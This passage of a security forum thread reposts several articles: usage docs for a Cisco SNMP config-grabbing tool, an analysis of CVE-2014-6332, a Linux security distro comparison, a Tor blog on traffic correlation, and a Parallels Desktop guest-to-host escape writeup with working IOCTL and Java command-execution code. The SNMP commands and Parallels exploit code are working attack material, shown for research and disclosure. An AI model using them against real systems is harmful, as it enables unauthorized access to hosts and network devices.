occurring. Though I hope that users will find other interesting uses for this script and its source code. USAGE ===== In this example I will take a simple IOS device with an access list protecting a SNMP service using the community string 'cisco' access-list 10 permit 10.100.100.0 0.0.0.255 snmp-server community cisco rw 10 One IOS device's IP address is `10.0.0.1` The pentester has an IP address `10.0.0.2` and has started a TFTP server. If the tester knows all of this they use the one shot single mode to grab the device's config file. E.g. ./slap.py single cisco 10.0.0.2 10.100.100.100 10.0.0.1 If the tester doesn't know the details of they could try and guess. Lets say the tester has done some recon and has figured out that all internal addresses are the 10.0.0.0/8 range. ./slap.py seqmask private 10.0.0.2 10.0.0.0 0.255.255.0 10.0.0.1 /tftproot/ This command will search through all the /24, the tester hopes they can save some time by assuming a whole subnet will be allowed access rather than just one IP address. root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask cisco 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/ Cisco SNMP Slap, v0.3 Darren McDonald, darren.mcdonald@nccgroup.com WARNING: No route found for IPv6 destination :: (no default route?) Community String: cisco TFTP Server IP : 10.0.0.2 Source IP: 10.0.0.5 Source Mask: 0.255.255.0 Destination IP: 10.0.0.1 TFTP Root Path: /tftproot//cisco-config.txt 10.0.0.5 10.0.1.5 10.0.2.5 < ... cut for brevity ... > 10.100.99.255 10.100.100.0 10.100.100.1 10.100.100.2 10.100.100.3 10.100.100.4 10.100.100.5 10.100.100.6 Success! You should notice that the program exists and announces success several IP addresses after it enters the `10.100.100.0/24` range. This because it is not possible to determine which source address was successful, but determines one of the requests was successful after the config file turns up in the tftproot. Given you've just nabbed the running config you can now find out the details of the ACL yourself. Rather than specifying a single community string you can also give a list which should be used. The mode names are the same except have a `'_l'` suffix. For example to repeat the same attack using a list of community strings in in list.txt the following arguments should be used. root@Athena:/home/notroot/cisco-snmp-slap# ./slap.py seqmask_l list.txt 10.0.0.2 10.0.0.5 0.255.255.0 10.0.0.1 /tftproot/ Cisco SNMP Slap, v0.3 Darren McDonald, darren.mcdonald@nccgroup.com WARNING: No route found for IPv6 destination :: (no default route?) Community File: list.txt TFTP Server IP : 10.0.0.2 Source IP: 10.0.0.5 Source Mask:0.255.255.0 Destination IP: 10.0.0.1 TFTP Root Path: /tftproot//cisco-config.txt community strings loaded: ['private\n', 'cisco\n', 'public\n'] 10.0.0.5 / private 10.0.0.5 / cisco 10.0.0.5 / public 10.0.1.5 / private 10.0.1.5 / cisco 10.0.1.5 / public 10.0.2.5 / private 10.0.2.5 / cisco 10.0.2.5 / public 10.0.3.5 / private 10.0.3.5 / cisco 10.0.3.5 / public Now each IP address is checked with each community string in list.txt. SUPPORT ======= As programming languages go Python is a simple language, easy to read and write and I encourage you to attempt to debug and correct any issues you find and send me your changes so I can share them with other users on the NCC Github. But if you need assistance you can contact me at darren.mcdonald@nccgroup.com. I'll do my best to help you but you should be aware I am not a full time developer (which should be obvious from my code!) and may not immediately have time get to your query. VERSIONS ======== * 0.1 Inital version * 0.2 Added random and sequental modes and source address masks * 0.3 added community string file list feature, first public version Sursa: https://github.com/nccgroup/Cisco-SNMP-Slap
  16. Eric Lippert Dissects CVE-2014-6332, a 19 year-old Microsoft bug Share Posted by Eric, Nov 14, 2014 2 Comments Today's Coverity Security Research Lab blog post is from guest blogger Eric Lippert. [UPDATE 1: The MISSING_RESTORE checker regrettably doesn't find the defect in the code I've posted here. Its heuristics for avoiding false positives causes it to suppress reporting, ironically enough. We're working on tweaking that heuristic for an upcoming release.] It was with a bizarre combination of nostalgia and horror that I read this morning about a 19-year-old rather severe security hole in Windows. Nostalgia because every bit of the exploited code is very familiar to me: working on the portion of the VBScript engine used to exploit the defect was one of my first jobs at Microsoft back in the mid-1990s. And horror because this is really a quite serious defect that has been present probably since Windows 3.1, [Update 2: heard that Windows 3.1 is in fact not affected, so you IE 2-5 users are safe ] and definitely exploitable since Windows 95. Fortunately we have no evidence that this exploit has actually been used to do harm to users, and Microsoft has released a patch. (Part of my horror was the fear that maybe this one was my bad, but it looks like the actual bug predates my time at Microsoft. Whew!) The thirty-thousand foot view is the old familiar story. An attacker who wishes to run arbitrary code on a user's machine lures the user into browsing to a web page that contains some hostile script -- VBScript, in this case. The hostile script is running inside a "sandbox" which is supposed to ensure that it only does "safe" operations, but the script attempts to force a particular buggy code path through the underlying operating system code. If it does so successfully, it produces a corrupt data structure in memory which can then be further manipulated by the script. By cleverly controlling the contents of the corrupted data structure, the hostile script can read or write memory and execute code of their choice. Today I want to expand a bit on Robert Freeman's writeup, linked above, to describe the underlying bug in more detail, the pattern that likely produced it, better ways to write the code, and whether static analysis tools could find this bug. I'm not going to delve into the specifics of how this initially-harmless-looking bug can be exploited by attackers. What's so safe about a SAFEARRAY? Many of the data structures familiar to COM programmers today, like VARIANT, BSTR and SAFEARRAY, were created for "OLE Automation"; old-timers will of course remember that OLE stood for "object linking and embedding", the "paste this Excel spreadsheet into that Word document" feature. OLE Automation was the engine that enabled Word and Excel objects to be accessed programmatically by Visual Basic. (In fact the B in BSTR stands for "Basic".) Naturally, Visual Basic uses these data structures for its representations of strings and arrays. The data structure which particularly concerns us today is SAFEARRAY: typedef struct tagSAFEARRAY { USHORT cDims; // number of dimensions USHORT fFeatures; // type of elements ULONG cbElements; // byte size per element ULONG cLocks; // lock count PVOID pvData; // data buffer SAFEARRAYBOUND rgsabound[1]; // bounds, one per dimension } SAFEARRAY; typedef struct tagSAFEARRAYBOUND { ULONG cElements; // number of indices in this dimension LONG lLbound; // lowest valid index } SAFEARRAYBOUND; SAFEARRAYs are so-called because unlike an array in C or C++, a SAFEARRAY inherently knows the dimensionality of the array, the type of the data in the array, the number of bytes in the buffer, and finally, the bounds on each dimension. How multi-dimensional arrays and arrays of unusual types are handled is irrelevant to our discussion today, so let's assume that the array involved in the attack is a single-dimensional array of VARIANT. The operating system method which contained the bug was SafeArrayRedim, which takes an existing array and a new set of bounds for the least significant dimension -- though again, for our purposes, we'll assume that there is only one dimension. The function header is: HRESULT SafeArrayRedim( SAFEARRAY *psa, SAFEARRAYBOUND *psaboundNew ) Now, we do not have the source code of this method, but based on the description of the exploit we can guess that it looks something like the code below that I made up just now. Bits of code that are not particularly germane to the defect I will omit, and I'll assume that somehow the standard OLE memory allocator has been obtained. Of course there are many cases that must be considered here -- such as "what if the lock count is non zero?" -- that I am going to ignore in pursuit of understanding the relevant bug today. As you're reading the code, see if you can spot the defect: { // Omitted: verify that the arguments are valid; produce // E_INVALIDARG or other error if they are not. PVOID pResourcesToCleanUp = NULL; // We'll need this later. HRESULT hr = S_OK; // How many bytes do we need in the buffer for the original array? // and for the new array? LONG cbOriginalSize = SomehowComputeTotalSizeOfOriginalArray(psa); LONG cbNewSize = SomehowComputeTotalSizeOfNewArray(psa, psaboundNew); LONG cbDifference = cbNewSize - cbOriginalSize; if (cbDifference == 0) { goto DONE; } SAFEARRAYBOUND originalBound = psa->rgsabound[0]; psa->rgsabound[0] = *psaboundNew; // continues below ... Things are looking pretty reasonable so far. Now we get to the tricky bit. Why is it so hard to shrink an array? If the array is being made smaller, the variants that are going to be dropped on the floor might contain resources that need to be cleaned up. For example, if we have an array of 1000 variants containing strings, and we reallocate that to only 300, those 700 strings need to be freed. Or, if instead of strings they are COM objects, they need to have their reference counts decreased. But now we are faced with a serious problem. We cannot clean up the resources after the reallocation. If the reallocation succeeds then we no longer have any legal way to access the memory that we need to scan for resources to free; that memory could be shredded, or worse, it could be reallocated to another block on another thread and filled in with anything. You simply cannot touch memory after you've freed it. But we cannot clean up resources before the reallocation either, because what if the reallocation fails? It is rare for a reallocation that shrinks a block to fail. While the documentation for IMalloc::Realloc doesn't call out it can fail when shrinking (doc bug?), it doesn't rule it out either. In that case we have to return the original array, untouched, and deallocating 70% of the strings in the array is definitely not "untouched". The solution to this impass is we have to allocate a new block and copy the resources into that new block before the reallocation. After a successful reallocation we can clean up the resources; after a failed reallocation we of course do not. // ... continued from above if (cbDifference < 0) { pResourcesToCleanUp = pmalloc->Alloc(-cbDifference); if (pResourcesToCleanUp == NULL) { hr = E_OUTOFMEMORY; goto DONE; } // Omitted: memcpy the resources to pResourcesToCleanUp } PVOID pNewData = pmalloc->Realloc(psa->pvData, cbNewSize); if (pNewData == NULL) { psa->rgsabound[0] = originalBound; hr = E_OUTOFMEMORY; goto DONE; } psa->pvData = pNewData; if (cbDifference < 0) { // Omitted: clean up the resources in pResourcesToCleanUp } else { // Omitted: initialize the new array slots to zero } hr = S_OK; // Success! DONE: // Don't forget to free that extra block. if (pResourcesToCleanUp != NULL) pmalloc->Free(pResourcesToCleanUp); return hr; } Did you spot the defect? Part of the contract of this method is that when this method returns a failure code, the original array is unchanged. The contract is violated in the code path where the array is being shrunk and the allocation of pResourcesToCleanUp fails. In that case we return a failure code, but never restore the state of the bounds which were mutated earlier to the smaller values. Compare this code path to the code path where the reallocation fails, and you'll see that the restoration line is missing. In a world where there is no hostile code running on your machine, this is not a serious bug. What's the worst that can happen? In the incredibly rare case where you are shrinking an array by an amount bigger than the memory you have available in the process, you end up with a SAFEARRAY that has the wrong bounds in a program that just produced a reallocation error anyways, and any resources that were in that memory are never freed. Not a big deal. This is the world in which OLE Automation was written: a world where people did not accidentally download hostile code off the Internet and run it automatically. But in our world this bug is a serious problem! An attacker can make what used to be an incredibly rare situation -- running out of virtual address space at exactly the wrong time -- quite common by carefully controlling how much memory is allocated at any one time by the script. An attacker can cause the script engine to ignore the reallocation error and keep on processing the now-internally-inconsistent array. And once we have an inconsistent data structure in memory, the attacker can use other sophisticated techniques to take advantage of this corrupt data structure to read and write memory that they have no business reading and writing. Like I said before, I'm not going to go into the exact details of the further exploits that take advantage of this bug; today I'm interested in the bug itself. See the linked article for some thoughts on the exploit. How can we avoid this defect? How can we detect it? It is surprisingly easy to write these sorts of bugs in COM code. What can you do to avoid this problem? I wrote who knows how many thousands of lines of COM code in my early days at Microsoft, and I avoided these problems by application of a strict discipline. Among my many rules for myself were: Every method has exactly one exit point. Every local variable is initialized to a sensible value or NULL. Every non-NULL local variable is cleaned up at the exit point Conversely, if the resource is cleaned up early on a path, or if its ownership is ever transferred elsewhere, then the local is set back to NULL. Methods which modify memory locations owned by their callers do so only at the exit point, and only when the method is about to return a success code. The code which I've presented here today -- which I want to emphasize again I made up myself just now to illustrate what the original bug probably looks like -- follows some of these best practices, but not all of them. There is one exit point. Every local is initialized. One of the resources -- the pResourcesToCleanUp block -- is cleaned up correctly at the exit point. But the last rule is violated: memory owned by the caller is modified early, rather than immediately before returning success. The requirement that the developer always remember to re-mutate the caller's data in the event of an error is a bug waiting to happen, and in this case, it did happen. Clearly the code I presented today does not follow my best practices for writing good COM methods. Is there a more general pattern to this defect? A closely related defect pattern that I see quite often in C, C++, C# and Java is: someLocal = someExternal; someExternal = differentValue; DoSomethingThatDependsOnTheExternal(); //... lots of code ... if (someError) return; //... lots of code ... someExternal = someLocal; And of course the variation where the restoration of the external value is skipped because of an unhandled exception is common in C++, C# and Java. Could a static analyzer help find defects like this? Certainly; Coverity's MISSING_RESTORE analyzer finds defects of the form I've just described. (Though I have not yet had a chance to run the code I presented today through it to see what happens.) There are a lot of challenges in designing analyzers to find the defect I presented today; one is determining that in this code the missing restoration is a defect on the error path but correct on the success path. This real-world defect is a good inspiration for some avenues for further research in this area; have you seen similar defects that follow this pattern in real-world code, in any language? I'd love to see your examples; please leave a comment if you have one. Sursa: Coverity Security Research Lab
  17. Linux Security Distros Compared: Tails vs. Kali vs. Qubes Thorin Klosowski Filed to: security If you're interested in security, you've probably already heard of security-focused Linux distros like Tails, Kali, and Qubes. They're really useful for browsing anonymously, penetration testing, and tightening down your system so it's secure from would-be hackers. Here are the strengths and weaknesses of all three. It seems like every other day we hear about another hack, browser exploit, or nasty bit of malware. If you do a lot of your browsing on public Wi-Fi networks, you're a lot more susceptible to these types of hacks. A security-focused distribution of Linux can help. For most of us, the use cases here are pretty simple. If you need to use a public Wi-Fi network at a coffee shop or the library, then one of these distributions can hide your traffic from someone trying to peek in. Likewise, if you're worried about someone tracking down your location—whether it's a creepy stalker or something even worse—randomizing and anonyming your traffic keeps you safe. Obviously you don't need this all the time, but if you're checking bank statements, uploading documents onto a work server, or even just doing some shopping, it's better to be safe than sorry. All of these distributions can run in a virtual machine or from a Live CD/USB. That means you can carry them around in your pocket and boot into them when you need to without causing yourself too much trouble. Tails Provides Security Through Anonymity Tails is a live operating system built on Debian that uses Tor for all its internet traffic. Its main goal is to give you security through anonymity. With it, you can browse the web anonymously through encrypted connections. Tails protects you in a number of ways. First, since all your traffic is routed through Tor, it's incredibly difficult to track your physical location or see which sites you visit. Tails doesn't use a computer's hard disk, so nothing you do is saved to the computer you're running it on. Instead, everything you're working on is stored in RAM and erased when you shut down. This means any sensitive documents you're working on are never stored permanently. Because of that, Tails is a really good operating system to use when you're on a public computer or network. Tails is also packed with a bunch of basic cryptographic tools. If you're running Tails off a USB drive, it's encrypted with LUKS. All your internet traffic is encrypted with HTTPS Everywhere, your IM conversations are encrypted with OTR, and your emails and documents are encrypted with OpenPGP. The crux of Tails is anonymity. While it has cryptographic tools in place, its main purpose is to anonymize everything you're during online. This is great for most people, but it doesn't give you the freedom to do stupid things. If you log into your Facebook account under your real name, it's still going to be obvious who you are and remaining anonymous on an online community is a lot harder than it seems. Pros: Routes all your traffic through Tor, comes with a ton of open-source software, has a "Windows Camouflage" mode to make it look more like Windows 8. Cons: Can't save files locally, slow, loading web sites through Tor takes forever. Who It's Best For: Tails is best suited for on-the-go security. If you find yourself at coffee shops or public libraries using the internet a lot, then Tails is perfect for you. Anonymity is the game, so if you're sick of everyone tracking what you're doing, Tails is great, but keep in mind that it's also pretty useless unless you use pseudonyms everywhere online. Kali Is All About Offensive Security Where Tails is about anonymity, Kali is mostly geared toward security testing. Kali is built on Debian and maintained by Offensive Security Ltd. You can run Kali off a Live CD, USB drive, or in a virtual machine. Kali's main focus is on pen testing, which means it's great for poking around for security holds in your own network, but isn't built for general use. That said, it does have a few basic packages, including Iceweasel for browsing the web and everything you need to run a secure server with SSH, FTP, and more. Likewise, Kali is packed with tools to hide your location and set up VPNs, so it's perfectly capable of keeping you anonymous. Kali has around 300 tools for testing the security of a network, so it's hard to really keep track of what's included, but the most popular thing to do with Kali is crack a Wi-Fi password. Kali's motto adheres to "a best defense is a good offense" so it's meant to help you test the security of your network as a whole, rather than just making you secure on one machine. Still, if you use Kali Linux, it won't leave anything behind on the system you're running it on, so it's pretty secure itself. Besides a Live CD, Kali can also run on a ton of ARM devices, including the Raspberry Pi, BeagleBone, several Chromebooks, and even the Galaxy Note 10.1. Pros: Everything you need to test a network is included in the distribution, it's relatively easy to use, and can be run on both a Live CD and in a virtual machine. Cons: Doesn't include too many tools for everyday use, doesn't include the cryptographic tools that Tails does. Who It's Best For: Kali is best suited for IT administrators and hobbyists looking to test their network for security holes. While it's secure itself, it doesn't have the basic daily use stuff most of us need from an operating system. Qubes Offers Security Through Isolation Qubes is desktop environment based on Fedora that's all about security through isolation. Qubes assumes that there can't be a truly secure operating system, so instead it runs everything inside of virtual machines. This ensures that if you are victim to a malicious attack, it doesn't spread to the operating system as a whole. With Qubes, you create virtual machines for each of your environments. For example, you could create a "Work" virtual machine that includes Firefox and Thunderbird, a "Shopping" virtual machine that includes just Firefox, and then whatever else you need. This way, when you're messing around in the "Shopping" virtual machine, it's isolated from your "Work" virtual machine in case something goes wrong. You can create virtual machines of Windows and Linux. You can also create disposable virtual machines for one time actions. Whatever happens within these virtual machines is isolated, but its not secured. If you run a buggy web browser, Qubes doesn't do much to stop the exploit. The architecture itself is set up to protect you as well. Your network connection automatically gets its own virtual machine and you can set up a proxy server for more security. Likewise, storage gets its own virtual machine as well, and everything on your hard drive is automatically encrypted. The major downfall with Qubes is the fact that you need to do everything manually. Setting up virtual machines secures your system as a whole, but you have to be proactive in actually using them. If you want your data to remain secure, you have to separate it from everything else. Pros: The isolation technique ensures that if you do download malware, your entire system isn't infected. Qubes works on a wide variety of hardware, and it's easy to securely share clipboard data between VMs. Cons: Qubes requires that you take action to create the VMs, so none of the security measures are foolproof. It's still totally susceptible to malware or other attacks too, but there's less of a chance that it'll infect your whole system. Who It's Best For: Qubes is best for proactive types who don't mind doing a bit of work to set up a secure environment. If you're working on something you don't want in other people's hands, writing out a bunch of personal information, or you're just handing over your computer to a friend who love clicking on malicious-looking sites, then a virtual machine's an easy way to keep things secure. Where something like Tails does everything for you out of the box, Qubes takes a bit of time to set up and get working. Qubes user manual is pretty giant so you have to be willing to spend some time learning it. The Rest: Ubuntu Privacy Remix, JonDo, and IprediaOS Tails, Kali, and Qubes certainly aren't the only security-focused operating systems around. Let's take a quick look at a few other popular options. Ubuntu Privacy Remix: As the name suggests, Ubuntu Privacy Remix is a privacy focused distribution built on Ubuntu. It's offline-only, so it's basically impossible for anyone to hack into it. The operating system is read-only so it can't be changed and you can only store data on encrypted removable media. It has a few other tricks up its sleeve, including a system to block third parties from activating your network connection and TrueCrypt encryption. JonDO: JonDo is a Live DVD based on Debian that contains proxy clients, a preconfigured browser for anonymous surfing, and a number of basic level security tools. It's similar to Tails, but is a bit more simplified and unfamiliar. IprediaOS: Like Tails, IprediaOS is all about anonymity. Instead of routing traffic through Tor, IprediaOS routes through I2P. Of course, none of these operating systems are particularly ideal for day-to-day use. When you're anonymizing your traffic, hiding it away, or isolating it from the rest of your operating system you tend to take away from system resources to slow things down. Likewise, the bandwidth costs means most of your web browsing is pretty terrible. All that said, these browsers are great when you're on public Wi-Fi, using a public computer, or when you just need to use a friend's computer that you don't want to leave your private data on. They're all secure enough to protect most of us with our general behavior, so pick whichever one is best suited for your particular needs. Photo by yyang. Sursa: Linux Security Distros Compared: Tails vs. Kali vs. Qubes
  18. Traffic correlation using netflows Posted November 14th, 2014 by arma in People are starting to ask us about a recent tech report from Sambuddho's group about how an attacker with access to many routers around the Internet could gather the netflow logs from these routers and match up Tor flows. It's great to see more research on traffic correlation attacks, especially on attacks that don't need to see the whole flow on each side. But it's also important to realize that traffic correlation attacks are not a new area. This blog post aims to give you some background to get you up to speed on the topic. First, you should read the first few paragraphs of the One cell is enough to break Tor's anonymity analysis: First, remember the basics of how Tor provides anonymity. Tor clients route their traffic over several (usually three) relays, with the goal that no single relay gets to learn both where the user is (call her Alice) and what site she's reaching (call it Bob). The Tor design doesn't try to protect against an attacker who can see or measure both traffic going into the Tor network and also traffic coming out of the Tor network. That's because if you can see both flows, some simple statistics let you decide whether they match up. Because we aim to let people browse the web, we can't afford the extra overhead and hours of additional delay that are used in high-latency mix networks like Mixmaster or Mixminion to slow this attack. That's why Tor's security is all about trying to decrease the chances that an adversary will end up in the right positions to see the traffic flows. The way we generally explain it is that Tor tries to protect against traffic analysis, where an attacker tries to learn whom to investigate, but Tor can't protect against traffic confirmation (also known as end-to-end correlation), where an attacker tries to confirm a hypothesis by monitoring the right locations in the network and then doing the math. And the math is really effective. There are simple packet counting attacks (Passive Attack Analysis for Connection-Based Anonymity Systems) and moving window averages (Timing Attacks in Low-Latency Mix-Based Systems), but the more recent stuff is downright scary, like Steven Murdoch's PET 2007 paper about achieving high confidence in a correlation attack despite seeing only 1 in 2000 packets on each side (Sampled Traffic Analysis by Internet-Exchange-Level Adversaries). Second, there's some further discussion about the efficacy of traffic correlation attacks at scale in the Improving Tor's anonymity by changing guard parameters analysis: Tariq's paper makes two simplifying assumptions when calling an attack successful [...] 2) He assumes that the end-to-end correlation attack (matching up the incoming flow to the outgoing flow) is instantaneous and perfect. [...] The second one ("how successful is the correlation attack at scale?" or maybe better, "how do the false positives in the correlation attack compare to the false negatives?") remains an open research question. Researchers generally agree that given a handful of traffic flows, it's easy to match them up. But what about the millions of traffic flows we have now? What levels of false positives (algorithm says "match!" when it's wrong) are acceptable to this attacker? Are there some simple, not too burdensome, tricks we can do to drive up the false positives rates, even if we all agree that those tricks wouldn't work in the "just looking at a handful of flows" case? More precisely, it's possible that correlation attacks don't scale well because as the number of Tor clients grows, the chance that the exit stream actually came from a different Tor client (not the one you're watching) grows. So the confidence in your match needs to grow along with that or your false positive rate will explode. The people who say that correlation attacks don't scale use phrases like "say your correlation attack is 99.9% accurate" when arguing it. The folks who think it does scale use phrases like "I can easily make my correlation attack arbitrarily accurate." My hope is that the reality is somewhere in between — correlation attacks in the current Tor network can probably be made plenty accurate, but perhaps with some simple design changes we can improve the situation. The discussion of false positives is key to this new paper too: Sambuddho's paper mentions a false positive rate of 6%. That sounds like it means if you see a traffic flow at one side of the Tor network, and you have a set of 100000 flows on the other side and you're trying to find the match, then 6000 of those flows will look like a match. It's easy to see how at scale, this "base rate fallacy" problem could make the attack effectively useless. And that high false positive rate is not at all surprising, since he is trying to capture only a summary of the flows at each side and then do the correlation using only those summaries. It would be neat (in a theoretical sense) to learn that it works, but it seems to me that there's a lot of work left here in showing that it would work in practice. It also seems likely that his definition of false positive rate and my use of it above don't line up completely: it would be great if somebody here could work on reconciling them. For a possibly related case where a series of academic research papers misunderstood the base rate fallacy and came to bad conclusions, see Mike's critique of website fingerprinting attacks plus the follow-up paper from CCS this year confirming that he's right. I should also emphasize that whether this attack can be performed at all has to do with how much of the Internet the adversary is able to measure or control. This diversity question is a large and important one, with lots of attention already. See more discussion here. In summary, it's great to see more research on traffic confirmation attacks, but a) traffic confirmation attacks are not a new area so don't freak out without actually reading the papers, and this particular one, while kind of neat, doesn't supercede all the previous papers. (I should put in an addendum here for the people who are wondering if everything they read on the Internet in a given week is surely all tied together: we don't have any reason to think that this attack, or one like it, is related to the recent arrests of a few dozen people around the world. So far, all indications are that those arrests are best explained by bad opsec for a few of them, and then those few pointed to the others when they were questioned.) Sursa: https://blog.torproject.org/blog/traffic-correlation-using-netflows
  19. Simple guest to host VM escape for Parallels Desktop First post in this blog that written in english, please be patient with my awful language skills. This is a little story about exploiting guest to host VM escape not-a-vulnerability in Parallels Desktop 10 for Mac. Discovered attack is not about some serious hardcore stuff like hypervisor bugs or low-level vulnerabilities in guest-host communication interfaces, it can be easily performed even by very lame Windows malware if your virtual machine has insecure settings. Discovering It always was obvious to me, that rich features for communicating with the guest operating systems (almost any modern desktop virtualisation software has them) might be dangerous. Recently I finally decided to check, how exactly they can be dangerous on example of the virtualisation software that I'm using on OS X (and millions of other users too). It's a nice product and I think that currently it has a much less attention of security researchers than it actually deserving. Parallels Desktop 10 virtual machines has a lot of user-friendly capabilities for making guest operating system highly integrated with the host, and most of such options are enabled by default. Let's talk about one of them: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Parallels Desktop 10 VM options[/TD] [/TR] [/TABLE] There is "Access Windows folder from Mac" option that looks pretty innocent (please note, that all other sharing options are off). This option is enabled by default for all of the virtual machines as well, and here is the description of this option from Parallels Desktop 10 for Mac User's Guide: Access a Windows Folder or File from a Mac OS X Application By default, you can navigate to all your Windows folders and files from Mac OS X. Windows disks are mounted to /Volumes. At the same time, Windows appears as a hard disk mounted on the Mac OS X desktop. Note: The Windows disk disappears from the desktop and the Finder, but you can still access all of the Windows files and folders via the Windows PVM file and Terminal (/Volumes). By default, the PVM file is either in /Users/<Username>/Documents/Parallels/ or /Users/Shared. You can also find the PVM file by right-clicking Windows in Parallels Desktop Control Center (or in the virtual machine window when Windows is shut down) and selecting Show in Finder. To access Windows files and folders, right-click the PVM file, select Show Package Contents from the context menu, and open the Windows Disks folder. To disable the ability to navigate to Windows files and folders, deselect Access Windows folders from Mac in step 3 above. Well, just a guest file system sharing, you'll say, what could possibly go wrong? Unfortunately, a lot. After enabling this option you also can notice, that in context menu of Windows Explorer presents a very interesting "Open on Mac" shortcut: Looks promising, right? Technically this option asking the piece of Parallels software that working on the host side to do the thing, that equivalent to double-clicking on a target file in Finder. Guest-side part of this option is implemented as PrlToolsShellExt.dll shell extension (MD5 sum of DLL with version 10.1.1.28614 on my Windows 8.1 x64 guest is 97D15FB584C589FA297434E08CD0252F). Menu item click handler is located at function sub_180005834() and after some pre-processing of input values it sends IOCTL request to the device \Device\prl_tg that aims to one of the Paralles kernel mode drivers (prl_tg.sys): After the breakpoint on this DeviceIoControl() call we will obtain a call stack backatrace and function arguments: 0:037> k L7 Child-SP RetAddr Call Site 00000000`12bcd1c0 00007ff9`2a016969 PrlToolsShellExt!DllUnregisterServer+0x1596 00000000`12bcd310 00007ff9`2a01fd71 SHELL32!Ordinal93+0x225 00000000`12bcd410 00007ff9`2a4cf03a SHELL32!SHCreateDefaultContextMenu+0x581 00000000`12bcd780 00007ff9`2a4cc4b1 SHELL32!Ordinal927+0x156c2 00000000`12bcdaf0 00007ff9`2a4c76f7 SHELL32!Ordinal927+0x12b39 00000000`12bcded0 00007ff9`21d09944 SHELL32!Ordinal927+0xdd7f 00000000`12bcdf20 00007ff9`21d059d3 explorerframe!UIItemsView::ShowContextMenu+0x298 First 4 arguments of the DeviceIoControl(), rcx - device handle, r8 - input buffer, r9 - buffer length: 0:037> r rax=0000000012bcd240 rbx=0000000000000000 rcx=0000000000000d74 rdx=000000000022a004 rsi=0000000000000001 rdi=0000000000000070 rip=00007ff918bd5b92 rsp=0000000012bcd1c0 rbp=000000000022a004 r8=0000000012bcd240 r9=0000000000000070 r10=000000001a5bc990 r11=000000001a5bd110 r12=0000000000000002 r13=0000000012bcd490 r14=0000000012bcd4a0 r15=0000000016af90f0 Last 4 arguments of the DeviceIoControl() that was passed over the stack: 0:037> dq rsp L4 00000000`12bcd1c0 00000000`00000000 00000000`02bdc218 00000000`12bcd1d0 00000000`00000001 00000000`00ce2480 IOCTL request input buffer: 0:037> dq @r8 00000000`12bcd240 ffffffff`00008321 00000000`00010050 00000000`12bcd250 00000000`00000001 00000000`00000002 00000000`12bcd260 00000000`00000002 00000000`00000000 00000000`12bcd270 00000000`00000000 00000000`00000000 00000000`12bcd280 00000000`00000000 00000000`00000000 00000000`12bcd290 00000000`00000000 00000000`00000000 00000000`12bcd2a0 00000000`02c787d0 00000000`0000003c It consists from several magic values and pointer to the ASCII string with the target file path at 0x60 offset: 0:037> da poi(@r8+60) 00000000`02c787d0 "\\psf\TC\dev\_exploits\prl_guet_" 00000000`02c787f0 "to_host\New Text Document.txt" After sending this IOCTL control request to the driver, specified file will be opened at the host side. It's also interesting and useful, that this action can be triggered from Windows user account with any privileges (including Guest): [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]\Device\prl_tg security permissions[/TD] [/TR] [/TABLE] And because the target file will be opened at the host side with privileges of the current OS X user, it seems that "Access Windows folder from Mac" option is definitely breaks a security model that you're usually expecting from guest-host interaction. Exploiting The following function was implemented after the short reverse engineering of shell extension. It interacting with the Parallels kernel driver and executing specified file at the host side: void OpenFileAtTheHostSide(char *lpszFilePath){ HANDLE hDev = NULL; // get handle to the target device if (OpenDevice(L"\\Device\\prl_tg", &hDev)) { PDWORD64 RequestData = (PDWORD64)LocalAlloc(LMEM_FIXED, 0x70); if (RequestData) { IO_STATUS_BLOCK StatusBlock; ZeroMemory(RequestData, 0x70); /* Fill IOCTL request input buffer. It has the same layout on x86 and x64 versions of Windows */ RequestData[0x0] = 0xffffffff00008321; // magic values RequestData[0x1] = 0x0000000000010050; RequestData[0x2] = 0x0000000000000001; RequestData[0x3] = 0x0000000000000002; RequestData[0x4] = 0x0000000000000002; RequestData[0xc] = (DWORD64)lpszFilePath; // file path and it's length RequestData[0xd] = (DWORD64)strlen(lpszFilePath) + 1; NTSTATUS ns = NtDeviceIoControlFile( hDev, NULL, NULL, NULL, &StatusBlock, 0x22a004, // IOCTL code RequestData, 0x70, RequestData, 0x70 ); DbgMsg(__FILE__, __LINE__, "Device I/O control request status is 0x%.8x\n", ns); // ... M_FREE(RequestData); } CloseHandle(hDev); } } Now let's write some payload. Unfortunately, we can't execute a shell script or AppleScript file in this way because such files will be opened in a text editor. But there's still a lot of other evil things that attacker can do with the ability of arbitrary file opening. For example, it's possible to write a Java .class that executes specified command and saves it's output to the guest file system (that usually mounted at /Volumes/<windows_letter>): public static void main(String[] args) { // exeute command and get it's output StringBuilder output = new StringBuilder(); if (exec(defaultCmd, output) == -1) { output.append("Error while executing command"); } String volumesPath = "/Volumes"; File folder = new File(volumesPath); // enumerate mounted volumes of Parallels guests for (File file : folder.listFiles()) { if (file.isDirectory()) { // try to save command output into the temp String outFile = volumesPath + "/" + file.getName() + "/Windows/Temp/prl_host_out.txt"; try { write(outFile, output.toString()); } catch (IOException e) { continue; } } } } Using this .class and OpenFileAtTheHostSide() function we can implement a usable command execution exploit: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of commands using PoC[/TD] [/TR] [/TABLE] Full exploit code is available at GitHub: https://github.com/Cr4sh/prl_guest_to_host Protection from this attack is pretty simple: disabling "Access Windows folder from Mac" option in virtual machine settings prevents the ability of opening files from the guest systems. Also, you can enable "Isolate Windows from Mac" option that disables (in theory) all of the virtual machine sharing features: TL;DR It can be rather an incomplete documentation issue than vulnerability. It's absolutely not obvious for user, that guest file system sharing can lead to arbitrary code execution at the host side. Exploit is very simple and reliable, works under all of the versions of Windows on guest machines, attack can be performed with the privileges of any Windows user that belongs to the Everyone security group. This issue is also relevant to other guest operating systems (like Linux and OS X), however, provided PoC was designed only for Windows. It will be good to disable sharing options of virtual machines, if such attack vector might be a critical for your threat model. I think that It's very unlikely that Parallels will release any significant fixes or improvements for described mechanisms, because any reasonable fix will break the easy way of opening Windows documents on Mac. I played a bit with only one sharing option, but who knows now many similar (or even worse) security issues are actually exists in Parallels, VMware and Oracle products. PS: Have a good fun at ZeroNights, too bad that this year I'm missing it. Posted by ?r4sh Sursa: My aimful life: Simple guest to host VM escape for Parallels Desktop
  20. Nytro
